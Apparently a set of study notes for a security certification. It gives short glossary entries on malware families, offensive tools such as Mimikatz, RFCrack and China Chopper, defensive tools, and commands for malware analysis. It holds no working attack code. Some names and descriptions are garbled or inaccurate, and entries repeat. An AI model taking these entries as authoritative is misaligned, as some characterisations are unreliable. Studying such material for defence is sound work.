Splunk: It is a SIEM tool that can automatically collect all the event logs from
all the systems present in the network.

IExpress Wizard: It is a wrapper tool that guides the user to create a self-
extracting package that can automatically install the embedded setup files,
Trojans, etc.

Emotet: It is a dropper/downloader for well-known banking Trojans such as Zeus

Panda banker, Trickbot, and Iced ID to infect victims globally

Godzilla: It is a downloader that can be used for deploying malware on the target
machine

Spytech SpyAgent: Spytech SpyAgent is computer spy software that allows you to
monitor everything users do on your computer—in total secrecy.

KeyGrabber: A KeyGrabber hardware keylogger is an electronic device capable of

capturing keystrokes from a PS/2 or USB keyboard. It comes in various forms, such
as KeyGrabber USB, KeyGrabber PS/2, and KeyGrabber Nano Wi-Fi.

BackMatter: BlackMatter is dangerous ransomware written in C. This ransomware uses

encryption keys such as RSA public and AES keys for initializing and implementing
Salsa20 encryption on the targeted files. Using this malware, attackers can also
gain control over domain controllers, ACLs, and other user access controls (UACs).

RemoteExec: RemoteExec remotely installs applications, executes programs/scripts,

and updates files and folders on Windows systems throughout the network. This
allows an attacker to modify the registry, change local admin passwords, disable
local accounts, and copy/ update/delete files and folders.

Spytech SpyAgent: Spytech SpyAgent is computer spy software that allows you to
monitor everything users do on your computer—in total secrecy.

Mirai: Mirai is a self-propagating IoT botnet that infects poorly protected

Internet devices (IoT devices). Mirai uses telnet port (23 or 2323) to find those
devices that are still using their factory default username and password.

IExpress Wizard: IExpress Wizard is a wrapper program that guides the user to
create a self-extracting package that can automatically install the embedded setup
files, Trojans, etc.

BlackCat: BlackCat is a dreadful ransomware attack written in Rust and profoundly

known as ALPHA (AlphaVM, AlphaV). It is specially crafted ransomware comprising 4
encryption routines and supports several encryption algorithms such as ChaCha20 and
AES. The attack mainly focuses on crashing targeted devices and running processes,
applications, and VMs during their encryption process. BlackCat employs phishing
tactics on the victims by delivering its payload using vulnerable applications and
exposed toolsets.

Windows Service Manager command:

Create services:
srvman.exe add <file.exe/file.sys> [service name] [display name]
[/type:<service type>] [/start:<start mode>] [/interactive:no] [/overwrite:yes]

Delete services:
srvman.exe delete <service name>

Start/stop/restart services:
 srvman.exe start <service name> [/nowait] [/delay:<delay in msec>] /
srvman.exe stop <service name> [/nowait] [/delay:<delay in msec>] / srvman.exe
restart <service name> [/delay:<delay in msec>]

Install and start a legacy driver with a single call:

srvman.exe run <driver.sys> [service name] [/copy:yes] [/overwrite:no]
[/stopafter:<msec>]

Sheep Dip: Sheep dipping refers to the analysis of suspect files, incoming
messages, etc. for malware. The users isolate the sheep-dipped computer from other
computers on the network to block any malware from entering the system. Before
performing this process, it is important to save all downloaded programs on
external media such as CD-ROMs or DVDs. A computer used for sheep dipping should
have tools such as port monitors, files monitors, network monitors, and one or more
anti-virus programs for performing malware analysis of files, applications,
incoming messages, external hardware devices (such as USB, Pen drive, etc.), and so
on.

Droidsheep: DroidSheep tool is a used for session hijacking on Android devices

connected on common wireless network. It gets the session ID of active user on Wi-
Fi network and uses it to access the website as an authorized user. The droidsheep
user can easily see what the authorized user is doing or seeing on the website. It
can also hijack the social account by obtaining the session ID.

Sandbox: App sandboxing is a security mechanism that helps protect systems and
users by limiting resources the app can access to its intended functionality on the
mobile platform. Often, sandboxing is useful in executing untested code or
untrusted programs from unverified third parties, suppliers, untrusted users, and
untrusted websites. This is to enhance security by isolating an application to
prevent intruders, system resources, malwares such as Trojans and viruses, and
other applications from interacting with the protected app.

Malwarebytes: It is a tool for Windows operating system that provides comprehensive

security that blocks malware and hackers. It protects you from threats that
traditional antivirus isn't smart enough to stop.

BinText is a small text extractor utility that can extract text from any kind of
file and includes the ability to find plain ASCII text, Unicode (double byte ANSI)
text and Resource strings, providing useful information for each item in the
optional "advanced" view mode.

UPX (Ultimate Packer for Executables) is a free and open source executable packer
supporting a number of file formats from different operating systems.

ASPack is an advanced EXE packer created to compress Win32 executable files and to
protect them against non-professional reverse engineering.

PE Explorer lets you open, view and edit a variety of different 32-bit Windows
executable file types (also called PE files) ranging from the common, such as EXE,
DLL and ActiveX Controls, to the less familiar types, such as SCR (Screensavers),
CPL (Control Panel Applets), SYS, MSSTYLES, BPL, DPL and more (including executable
files that run on MS Windows Mobile platform).

Process Monitor: Process Monitor is a monitoring tool for Windows that shows real-
time file system, Registry, and process/thread activity.
More data captured for operation input and output parameters.
Non-destructive filters allow you to set filters without losing data.
Capture of thread stacks for each operation makes it possible in many cases
to identify the cause of an operation.
 Reliable capture of process details, including image path, command line, user
and session ID.
Configurable and moveable columns for any event property.
Filters can be set for any data field, including fields not configured as
columns.
Advanced logging architecture scales to tens of millions of captured events
and gigabytes of log data.
Process tree tool shows the relationship of all processes referenced in a
trace.
Native log format preserves all data for loading in a different Process
Monitor instance.

Netstat: It displays active TCP connections, ports on which the computer is

listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP,
ICMP, TCP, and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over
IPv6, and UDP over IPv6 protocols).

TCPView: TCPView is a Windows program that shows detailed listings of all TCP and
UDP endpoints on the system, including the local and remote addresses, and the
state of TCP connections. It provides a subset of the Netstat program that ship
with Windows.

IDA Pro: IDA Pro is a multi-platform disassembler and debugger that explores binary
programs, for which source code is not always available, to create maps of their
execution. It shows the instructions in the same way as a processor executes them
in a symbolic representation called assembly language. Thus, it is easy for you to
find the harmful or malicious processes.

Startup programs monitoring is used to detect suspicious startup programs and

processes.

Registry monitoring is used examine the changes made to the system’s registry by
malware.

Process monitoring is used to scan for suspicious processes.

Windows services monitoring traces malicious services initiated by the malware.

Since malware employs rootkit techniques to manipulate HKEY_LOCAL_MACHINE\System\
CurrentControlSet\Services registry keys to hide its processes, windows service
monitoring can be used to identify such manipulations.

readelf: displays information about one or more ELF object files. to extract static
artifacts from an ELF executable.
readelf -s <malware-sample> : to extract symbols from an ELF executable

readelf -l <malware-sample> : to retrieve ELF program headers

readelf --file-header <malware-sample> : to retrieve the information

contained in the ELF header at the start of the file

strings malware-sample > str.txt : to extract strings from an ELF executable

file

readelf -h <malware-sample> : Execute this command to retrieve the

information contained in the ELF header at the start of the file

Loggly: It is a log monitoring/analysis tool that can be used by security analysts

as a primary source of information and helps in identifying security gaps with the
systems or network.
LIEF: LIEF is an acronym for Library to Instrument Executable Formats. It is a
cross-platform tool developed by QuarksLab for parsing and manipulating different
executable formats including Mach-O binary formats.

Verisys: It is a file integrity checking tool that can help analysts Scan for
suspicious files and folders and detect any Trojans installed as well as system
file modifications.

python oledump.py ‘<path to the suspect document>’ : python oledump.py ‘<path to

the suspect document>’
Security experts can extract the contents of any particular macro stream with
oledump tool.

ophcrack: ophcrack is a Windows password-cracking tool that uses rainbow tables for
cracking passwords. It comes with a graphical user interface (GUI) and runs on
different OSs such as Windows, Linux/UNIX, etc.

strace command:
strace -p <ProcessID> : Run this command for attaching the strace tool to the
active process.

strace -c ls > /dev/null : Run the following command to count time, calls,
and errors for each system call.

strace -o out.txt ./<sample file> : Execute this command to extract system

calls and save the output in a text file

strace -P <given path> ls /var/empty : Execute this command to view only

system calls accessing a specific or given path

xHelper: Android/Trojan.Dropper.xHelper is a variant of Android/Trojan.Dropper.

cSploit: cSploit is an Android network analysis and penetration suite that is used
to map the local network, fingerprint hosts' operating systems and open ports,
perform integrated traceroute, forge TCP/UDP packets, and perform MITM attacks such
as password sniffing, JavaScript injection, capturing real-time network traffic,
DNS spoofing, and session hijacking.

Intezer: Intezer is malware analysis platform that scans files, URLs, end points,
and memory dumps. It extracts strings from uploaded malware samples and identifies
whether those strings are used in other files. It reduces the effort of malware
analysts by analyzing unknown malware that is difficult to trace.

Network Spoofer: Network Spoofer allows you to change websites on others’ computers
via an Android phone.

ASPack: It is a packaging/obfuscation tool that can be used by a security analyst

to to determine if the file includes packed elements and also locate the tool or
method used for packing it.

Mach-O: Mach object (Mach-O) is an executable file format similar to the Portable
Executable (PE) format for Windows and ELF for Linux. It is associated with
binaries present in macOS and iOS.

TCPView: TCPView is a Windows program that shows detailed listings of all TCP and
UDP endpoints on the system, including the local and remote addresses, and the
state of the TCP connections.
Monit: It is a process monitoring tool that helps security analysts in
understanding the processes that the malware initiates and takes over after
execution.

Veracode: It is a buffer overflow detection tool that help security analysts to

detect buffer overflow vulnerabilities.

Robber: Robber is an open-source tool that helps attackers to find executables

prone to DLL hijacking.

pagestuff: The pagestuff utility can be used to view Mach-O executable files and
find information regarding the logical pages associated with those files. It helps
identify malicious code and Objective-C methods such as deleteAppBySelf.

BeRoot: BeRoot is a post-exploitation tool to check common misconfigurations to

find a way to escalate privilege.

RainbowCrack: RainbowCrack cracks hashes with rainbow tables, using a time-memory

trade-off algorithm. Attackers use the RainbowCrack tool to crack the password
hashes of the target system.

Mimikatz: Mimikatz allows attackers to pass Kerberos TGT to other computers and
sign in using the victim’s ticket. The tool also helps in extracting plaintext
passwords, hashes, PIN codes, and Kerberos tickets from memory.

strace: The strace tool can be used to view or trace the system calls in a Linux
environment. The strace tool intercepts and records system calls by a process and
the signals received by the process.

Kiuwan: It is a buffer overflow detection tool that is used by security experts to

detect buffer overflow vulnerabilities.

ElectroRAT: ElectroRAT, a Go-program-based RAT, is designed to be compatible with

common OSes such as Windows, macOS, and Linux. The Trojan is delivered through a
downloadable application to cryptocurrency users for the malware creators to steal
the private keys of victims and access their crypto wallets.

PoisonIvy: The PoisonIvy remote administration tool is created and controlled by a

PoisonIvy management program or kit. The PoisonIvy kit consists of a graphical user
interface, and the backdoors are small (typically, <10 kB).

EquationDrug: EquationDrug is a dangerous computer rootkit that attacks the Windows

platform. It performs targeted attacks against various organizations and lands on
the infected system by being downloaded and executed by the Trickler dubbed
"DoubleFantasy," covered by TSL20110614-01 (Trojan.Win32.Micstus.A). It allows a
remote attacker to execute shell commands on the infected system.

BitCrypter: used to encrypt and compress 32-bit executables and .NET apps without
affecting their direct functionality. A Trojan or malicious software piece can be
encrypted into legitimate software to bypass firewalls and antivirus software.
BitCrypter supports a wide range of OS, from Windows XP to the latest Windows 10.

Resource Hacker: Resource Hacker™ is a resource editor for 32bit and 64bit Windows®
applications. It's both a resource compiler (for *.rc files), and a decompiler -
enabling viewing and editing of resources in executables (*.exe; *.dll; *.scr;
etc.) and compiled resource libraries (*.res, *.mui).

Ghirda: Ghirda is a software reverse engineering (SRE) framework created and

maintained by the National Security Agency Research Directorate. This framework
includes a suite of full-featured, high-end software analysis tools that enable
users to analyze compiled code on a variety of platforms including Windows, macOS,
and Linux. Capabilities include disassembly, assembly, decompilation, graphing, and
scripting, along with hundreds of other features.

Hakiri: Hakiri monitors Ruby apps for dependency and code security vulnerabilities.

Snyk: Snyk is the platform developers choose to build cloud native applications
securely.

DriverView: utility displays a list of all the device drivers currently loaded on
the system along with information such as load address of the driver, description,
version, and product name.

HashMyFiles: provides information about the file, such as the full path of the
file, date of creation, date of modification, file size, file attributes, file
version, and extension, which helps in searching for and comparing similar files.

Foren6: Attackers use tools such as Foren6 to sniff the traffic of IoT devices.
Foren6 is a non-intrusive 6LoWPAN network analysis tool.

Gqrx: Gqrx is an SDR implemented with the help of the GNU Radio and Qt GUI tool.
Attackers use Gqrx to observe the frequency bands of temperature/humidity sensors,
light switches, car keys, M-bus transmitters, etc. Gqrx can also enable an attacker
to listen to or eavesdrop on radio FM frequencies or any radio conversations.

RFCrack: Attackers use the RFCrack tool to obtain the rolling code sent by the
victim to unlock a vehicle and later use the same code for unlocking and stealing
the vehicle.

Gobuster: Gobuster is a Go-programming-based directory scanner that allows

attackers to perform fast-paced enumeration of hidden files and directories of a
target web application. It is a command-oriented tool used to brute-force URIs in
websites, DNS subdomains, names of virtual hosts on the target server, etc.

SockDetour: SockDetour is fileless malware that compromises a Windows system’s

legitimate processes and builds a secure C2 communication channel without requiring
a listening port to be open. Using SockDetour, attackers create a stealthy backup
backdoor that can continue its operation even after the primary backdoor is
detached from the infected machine.

China Chopper: Attackers use this web shell tool to gain remote control over target
web servers.

Astra: Attackers use the Astra tool to detect and exploit underlying
vulnerabilities in a REST API. Astra can discover and test authentications such
login and logout; this feature makes it easy for attackers to incorporate it into
the CICD pipeline.

beSTORM: beSTORM is a smart fuzzer that detects buffer overflow vulnerabilities by

automating and documenting the process of delivering corrupted inputs and watching
for an unexpected response from the application.

Universal Radio Hacker: Universal Radio Hacker (URH) is software for investigating
unknown wireless protocols used by various IoT devices.

x64dbg: It is a debugging tool that can be used by security experts to identify the
language used for programming the malware, APIs that reveal its function, etc.
Based on the reconstructed assembly code, you can inspect the program logic and
recognize its threat potential.

KillerBee: It is an IoT hacking tool used by attackers to exploit target IoT

devices and networks to perform various attacks such as DDoS, jamming, and
BlueBorne attacks.

Fing: Fing is a set of network tools that are used to identify all the devices
connected to any network, obtain the IP address, MAC address, device name, model,
and vendor of any connected device, and retrieve advanced information such as
NetBIOS, UPnP, Bonjour names, properties, and device types.

Cydia: Cydia is a software application for iOS that enables a user to find and
install software packages (including apps, interface customizations, and system
extensions) on a jailbroken iPhone, iPod Touch, or iPad.

Apricot: Apricot is a web-based mirror OS for the latest iPhones. It supports iOS
13.2 devices. Users can run this mirror iOS version with the default iOS 13.2
simultaneously. Apricot features provide a realistic experience for your iOS 13.2
iPhone.

pagestuff: The pagestuff utility can be used to view Mach-O executable files and
find information regarding the logical pages associated with those files. It also
helps security analysts to identify malicious code and Objective-C methods such as
deleteAppBySelf.

Splint: It is a buffer overflow detection tool that helps security analysts to

detect buffer overflow vulnerabilities.

RemoteExec: RemoteExec remotely installs applications, executes programs/scripts,

and updates files and folders on Windows systems throughout the network. This
allows an attacker to modify the registry, change local admin passwords, disable
local accounts, and copy/update/delete files and folders.

Pupy: It is a privilege escalation tool that helps attackers to install, execute,

delete, and/or modify the restricted resources on the victim machine.

olevba: The olevba tool can be used to view the source code of all VBA macros
embedded within a document and to identify suspicious VBA keywords and obfuscation
methods used by malware.

Jv16 PowerTools: Jv16 PowerTools is a PC system utility software that works by

erasing unnecessary files and data, cleaning the Windows registry, automatically
fixing system errors, and optimizing your system. It allows you to scan and monitor
the registry.

ClamWin: ClamWin is a Free Antivirus program for Microsoft Windows 10 / 8 / 7 /

Vista / XP / Me / 2000 / 98 and Windows Server 2012, 2008 and 2003.

ZeuS: ZeuS, also known as Zbot, is a powerful banking trojan that explicitly
attempts to steal confidential information like system information, online
credentials, and banking details, etc. Zeus is spread mainly through drive-by
downloads and phishing schemes.

BetterCAP: bettercap is an ARP poisoning tool and also it is the Swiss Army knife
for WiFi, Bluetooth Low Energy, wireless HID hijacking and Ethernet networks
reconnaissance and MITM attacks.

DNSRecon: DNSRecon is a zone enumeration tool that assists users in enumerating DNS
records such as A, AAAA, and CNAME. It also performs NSEC zone enumeration to
obtain DNS record files of a target domain.

Svmap: Svmap is an open-source scanner that identifies SIP devices and PBX servers
on a target network. It can be helpful for system administrators when used as a
network inventory tool.

Enyx: Enyx is an enumeration tool that fetches the IPv6 address of a machine
through SNMP.

Habu: is a hacking toolkit that provides various commands to perform ARP poisoning
attacks.

SPECTER: is a honeypot or deception system. It simulates a complete system and

provides an appealing target to lure hackers away from production systems.

Traffic IQ Professional: Traffic IQ Professional is a tool that audits and

validates the behavior of security devices by generating the standard application
traffic or attack traffic between two virtual machines.

Mole: Mole is an automatic SQL injection exploitation tool. Only by providing a

vulnerable URL and a valid string on the site, it can detect the injection and
exploit it using the union technique or a Boolean query-based technique.

Yersinia: Yersinia is a network tool designed to take advantage of weaknesses in

different network protocols like DHCP. It pretends to be a solid framework for
analyzing and testing the deployed networks and systems.

BCTextEncoder: The BCTextEncoder utility simplifies the encoding and decoding of

text data. It compresses, encrypts, and converts plaintext data into text format,
which the user can then copy to the clipboard or save as a text file.

Secure Everything: Secure Everything uses AES encryption to secure SMS, videos,
images, audio files, etc. This tool also helps in securing credit card details,
bank account details, SSN, etc.

FileVault 2: FileVault full-disk encryption (FileVault 2) utilizes the XTS-AES-128

encryption technology along with a 256-bit key to prevent unauthorized access to
the information on the startup disk.

Netcraft: Netcraft provides Internet security services, including anti-fraud and

anti-phishing services, application testing, and PCI scanning.

Sublist3r: Sublist3r is a Python script designed to enumerate the subdomains of

websites using OSINT. It enables you to enumerate subdomains across multiple
sources at once.

theHarvester: theHarvester is a tool designed to be used in the early stages of a

penetration test. It is used for open-source intelligence gathering and helps to
determine a company's external threat landscape on the Internet.

RITA (Real Intelligence Threat Analytics): It is an open-source framework for

detecting command and control communication through network traffic analysis.

Spoof-Me-Now is a program to change (spoof) your MAC Address

OmniPeek: OmniPeek Network Analyzer provides real-time visibility and expert

analysis of each part of the target network. This tool will analyze, drill down,
and fix performance bottlenecks across multiple network segments.
DerpNSpoof: DerpNSpoof is a DNS poisoning tool that assists in spoofing the DNS
query packet of a certain IP address or a group of hosts in the network

ike-scan: ike-scan discovers IKE hosts and can fingerprint them using the
retransmission backoff pattern.

AnDOSid: AnDOSid allows the attacker to simulate a DoS attack (an HTTP POST flood
attack to be precise) and DDoS attack on a web server from mobile phones.

Xplico: The goal of Xplico is extract from an internet traffic capture the
applications data contained. Xplico is an open source Network Forensic Analysis
Tool (NFAT). Xplico is released under the GNU General Public License.

Akamai: Akamai provides DDoS protection for enterprises regularly targeted by DDoS
attacks. Akamai Kona Site Defender delivers multi-layered defense that effectively
protects websites and web applications against the increasing threat,
sophistication, and scale of DDoS attacks.

Vindicate: Vindicate is an LLMNR/NBNS/mDNS spoofing detection toolkit for network

administrators. Security professionals use this tool to detect name service
spoofing.

Nmap: There are many tools, such as the Nmap that are available to use for the
detection of promiscuous mode. Nmap’s NSE script allows you to check if a target on
a local Ethernet has its network card in promiscuous mode. There is an NSE script
for nmap called sniffer-detect.nse which does just that. NAST: - it detects other
PC's in promiscuous mode by doing the ARP test.

FaceNiff: FaceNiff is an Android app that can sniff and intercept web session
profiles over the WiFi connected to the mobile. This app works on rooted android
devices. The Wi-Fi connection should be over Open, WEP, WPA-PSK, or WPA2-PSK
networks while sniffing the sessions.

OmniPeek: OmniPeek network analyzer provides real-time visibility and expert

analysis of each part of the target network. This tool will analyze, drill down,
and fix performance bottlenecks across multiple network segments. Attackers can use
this tool to analyze a network and inspect the packets in the network.

shARP: An anti-ARP-spoofing application software that use active and passive

scanning methods to detect and remove any ARP-spoofer from the network.

Vindicate: Vindicate is an LLMNR/NBNS/mDNS spoofing detection toolkit for network

administrators. Security professionals use this tool to detect name service
spoofing.

Akamai: Akamai provides DDoS protection for enterprises regularly targeted by DDoS
attacks. Akamai Kona Site Defender delivers multi-layered defense that effectively
protects websites and web applications against the increasing threat,
sophistication, and scale of DDoS attacks.

FileVault: FileVault full-disk encryption (FileVault 2) uses XTS-AES-128 encryption

with a 256-bit key to help prevent unauthorized access to the information on your
startup disk.

CrypTool 1 (CT1) – It is written in C++ and is a Windows program. It supports

classical and modern cryptographic algorithms (encryption and decryption, key
generation, secure passwords, authentication, secure protocols, etc.). It is used
to perform cryptanalysis of several algorithms (Vigenère, RSA, AES, etc.)
CrypTool 2 (CT2) – It supports visual programming GUI and execution of cascades of
cryptographic procedures. It runs under Windows.

JCrypTool (JCT) – It allows comprehensive cryptographic experimentation on Linux,

MAC OS X, and Windows. It also allows users to develop and extend its platform in
various ways with their own crypto plug-ins.

CrypTool-Online (CTO) – It runs in a browser and provides a variety of encryption

methods and analysis tools.